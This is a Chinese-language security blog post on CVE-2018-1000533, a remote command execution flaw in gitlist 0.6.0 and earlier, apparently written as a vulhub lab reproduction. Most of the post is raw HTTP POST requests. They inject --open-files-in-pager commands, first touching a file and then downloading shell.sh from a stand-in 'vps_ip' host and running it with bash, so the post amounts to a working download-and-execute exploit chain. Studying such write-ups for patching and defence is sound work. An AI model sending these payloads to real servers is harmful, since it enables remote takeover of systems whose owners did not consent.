CVE-2018-1000533
漏洞描述:gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本及以前,存在一处命令参数注入问题,可以导致远程命令执行漏洞。
影响版本:0.6.0版本及以前
参考资料:
- https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
- https://blog.csdn.net/EC_Carrot/article/details/117652583
POC:
POST /example/tree/a/search HTTP/1.1
Host: your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 56
query=--open-files-in-pager=touch /tmp/success;
漏洞复现
POST /example/tree/a/search HTTP/1.1
Host: your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xm l;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 56
query=--open-files-in-pager=curl http://vps_ip/shell.txt -o /tmp/shell.sh;
![图片[1]-【初级】gitlist 0.6.0 远程命令执行漏洞-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/11/d2b5ca33bd203656.png)
POST /example/tree/a/search HTTP/1.1
Host: 192.168.75.150:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 52
query=--open-files-in-pager=/bin/bash /tmp/shell.sh;
![图片[2]-【初级】gitlist 0.6.0 远程命令执行漏洞-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/11/d2b5ca33bd203753-1024x210.png)
![图片[3]-【初级】gitlist 0.6.0 远程命令执行漏洞-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/11/d2b5ca33bd203800.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容